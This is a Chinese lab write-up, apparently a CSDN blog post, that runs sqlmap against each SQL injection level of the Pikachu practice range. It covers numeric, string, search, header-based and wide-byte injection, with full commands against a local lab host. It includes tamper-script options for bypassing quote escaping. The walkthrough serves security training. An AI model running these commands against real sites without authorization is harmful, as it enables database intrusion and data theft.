pikachu靶场-SQL注入(slqmap注入)

使用sqlmap探测,在 window系统中操作sqlmap

数字型

在这里插入图片描述
在这里插入图片描述

  1. 操作页面无特殊信息,选择后直接输出信息,无可用信息
  2. 抓包后得知,请求类型是POST类型,复制数据格式供后续使用
  3. 存在cookie,但考虑到无登录需求,这里就不需要cookie作为参数了
  4. 输入操作指令探测
python sqlmap.py -u "URL" --data "数据格式" --batch 

# 操作实例
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --batch

在这里插入图片描述

  1. 得到结果,id字段存在SQL注入
  2. 注入类型包括(时间,布尔,报错,联合查询注入)这几类
  3. 闭合方式为数字型

字符型

在这里插入图片描述

  1. 网页无任何变化,只是换成了输入框
  2. 发现请求方式为GET类型
  3. 直接输入操作指令
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_str.php?name=allen+&submit=%E6%9F%A5%E8%AF%A2" --batch

在这里插入图片描述

  1. name字段存在SQL注入
  2. 注入类型包括(布尔,把偶从,时间,联合注入)这几类
  3. 闭合方式为闭合

搜索型

在这里插入图片描述

  1. 网页输入无变化,无可用信息
  2. 请求方式为GET型
  3. 输入操作指令
# -v 指定输出详细的payload
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_search.php?name=vince&submit=%E6%90%9C%E7%B4%A2" --batch -v 3

在这里插入图片描述

  1. name字段存在sql注入
  2. 注入类型(同上或图片中可以看到)
  3. 闭合方式为闭合

xx型

在这里插入图片描述

  1. GET请求
  2. 输入操作指令
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_x.php?name=vince&submit=%E6%9F%A5%E8%AF%A2" --batch -v 3

在这里插入图片描述

  1. 可获得信息和上面的一样

http header

在这里插入图片描述

  1. 请求为post类型,
  2. 发现cookie的样式不一样且有特殊的内容,猜测注入点在cookie部分
  3. 具体注入点不确定,将抓到的包保存下来后续使用(记好存放位置)
  4. 输入操作指令
python sqlmap.py -r "文件路径" --level 3 --batch -v 3

python sqlmap.py -r "F:\SQLmap\file\pheader.txt" --level 3 --batch -v 3
#这里默认level是1级,无法探测出来,就指定级别为3级
# -r :指定数据包文件

在这里插入图片描述

布尔盲注和时间盲注页面无任何有用信息反馈,操作也是一样的

宽字节注入

在这里插入图片描述

  1. 页面请求类型为post

  2. 宽字节不是注入类型,而是绕过过滤的方式

  3. 尝试正常注入

    python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_widebyte.php" --data "name=kobe&submit=%E6%9F%A5%E8%AF%A2" -p name  --level=3 -v 3
    

在这里插入图片描述

  1. 发现无法探测出来,那就增加宽字节处理脚本(这里是sqlmap自带的)
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_widebyte.php" --data "name=kobe&submit=%E6%9F%A5%E8%AF%A2" -p name --dbms=mysql --charset=GBK --tamper=unmagicquotes.py --level=3 -v 3
  1. –tamper:指定脚本,–dbs:探测的数据库类型,–charset:指定网站的编码方式

在这里插入图片描述

  1. 这里发现成功绕过,那就判断是宽字节绕过注入了
其它页面自己尝试有问题,后续在操作吧

pikachu --1

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值